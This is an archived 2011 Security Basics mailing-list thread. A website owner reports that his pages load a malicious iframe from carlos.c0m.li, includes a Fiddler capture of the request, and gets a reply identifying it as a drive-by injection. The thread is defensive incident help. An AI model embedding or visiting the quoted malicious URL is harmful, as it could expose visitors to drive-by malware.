Home page logo
/

basics logo Security Basics mailing list archives

Re: There is a strange get request header in all web pages of my site? I'm worry about Trojan attack!
From: Henri Salo <henri () nerv fi>
Date: Thu, 8 Sep 2011 14:03:11 +0300

On Thu, Sep 08, 2011 at 12:01:19AM +0430, Ali Asghar Toraby Parizy wrote:
Hi.
Today I found that Kasper Anti Virus has blocked my site and says to
the clients that this site is affected by a Trojan.
At the other hand I usually surf the Internet using Firefox. But today
I used IE to open my own site. But IE tells me following warning:
This page contains content that will not be delivered using a secure
HTTPS connection...
I traced my site with Fiddler debugging toll and I found that each
time I send a request to the site a get request handler is established
to the following URL:
"http://carlos.c0m.li/iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7";
I've searched about "carlos.c0m.li" in the internet and I saw in
"Google safe Browsing" something about that host in the following URL:
http://google.com/safebrowsing/diagnostic?site=carlos.c0m.li/
Google says that, that host has a maleware. please look at that report
and suggest a way to remove this bad thing from my site.
I've searched most of my public html directory. but I haven't found
any file that makes following http header. I have no idea. How can I
find that?


----- this is header that fiddler detects for every file that I open in my site:
GET /iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7 HTTP/1.1
Accept: application/x-ms-application, image/jpeg,
application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: carlos.c0m.li


HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 18:42:02 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 233
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

 ?

Drive-by attack. I'll bet the link contained malicious javascript. You should try to investigate how they injected that 
code to your page. I can also help if you tell me your web-page address.

Best regards,
Henri Salo

------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we examine the importance of Apache-SSL and who needs an SSL certificate.  We look at how SSL works, how 
it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, 
install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are 
highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates.

http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1
------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]